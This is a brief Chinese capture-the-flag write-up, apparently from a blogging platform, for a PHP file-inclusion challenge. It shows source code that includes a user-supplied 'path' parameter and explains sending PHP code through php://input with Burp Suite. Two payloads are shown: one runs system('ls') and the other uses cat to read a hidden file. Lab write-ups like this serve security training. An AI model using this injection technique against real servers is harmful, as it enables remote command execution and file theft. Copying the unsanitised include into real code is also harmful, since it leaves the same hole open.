爱春秋-include

进去发现是一段源码:

<?php 
show_source(__FILE__);
if(isset($_REQUEST['path'])){
    include($_REQUEST['path']);
}else{
    include('phpinfo.php');
}

默认是输出了phpinfo.php,因此查看里面的漏洞,提示是文件包含,找include,发现允许url注入,允许php://input的形式,使用post传输数据。

注入一句话木马,在浏览器中后缀?path=php://input使用burpsuite:
(1)查看有什么文件:<?php echo system('ls');?>

(2)查看特殊文件里的内容:<?php system("cat dle345aae.php");?>


©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容